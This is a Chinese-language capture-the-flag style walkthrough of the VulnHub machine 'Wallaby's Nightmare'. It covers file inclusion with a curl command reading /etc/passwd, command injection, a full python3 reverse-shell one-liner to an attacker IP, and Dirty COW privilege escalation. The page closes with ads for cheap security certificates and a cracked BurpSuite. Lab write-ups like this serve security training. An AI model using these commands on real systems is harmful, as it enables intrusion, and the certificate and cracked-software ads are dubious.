靶机下载地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/
这是一个类似于ctf的机器,靠脑洞
随便输入一个数字就行
点击上面的start the ctf,就来到了这个界面,经过dirb,dirsearch的扫描之后没有其他有用的界面,就一个图片,那么漏洞点就很容易猜啦
就是文件包含漏洞了,这样子看不好看
我们使用curl命令就好了
curl http://10.10.10.132/?page=/etc/passwd
我包含了各种文件,直到包含到了这个knockd.conf然后80端口就关闭了。。。。
之后这个80端口就关闭了,新开放了一个60080端口
尝试访问一下看看
看看图片有没有隐写信息,也是没有
再来猜测一下,和首页一样,有一个page参数,也是猜测成功了!
我们使用dirb进行文件包含的爆破
直到mailer,又是一个新的界面了,并且下面还有一个提示信息
我们抓包,尝试执行whoami!成功发现漏洞点!
查看python的版本,包含了3,但是没有2
那么就使用python3进行反弹shell吧
export RHOST="10.10.10.128";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
我是用uname -a的时候看到了系统信息比较老,可以使用藏牛提权!我们直接去github上下载藏牛的exp就好啦!
至此提权成功啦
往期推荐
全网低价证书找我 + baibaixiaoyu2024
包括且不限于cisp,cisp-pte,pts,cissp,cisp-ire,cisa,oscp,osep等等
往期推荐
新版BurpSuite v2025.6.3汉化版,附激活教程
重大更新!FeatherScan v4.5 内网 linux 信息收集,提权一键梭哈神器
FeatherScan v4.0 – 一款Linux内网全自动信息收集工具
近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等
内网渗透必备,microsocks,一个轻量级的socks代理工具
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!
【oscp】vulnerable_docker,三种代理方法打入内网
【内网渗透】CobaltStrike与MSF联动互相上线的方式
内网渗透必备,microsocks,一个轻量级的socks代理工具
【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!
DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程
红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学
不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学
ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略
本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
暂无评论内容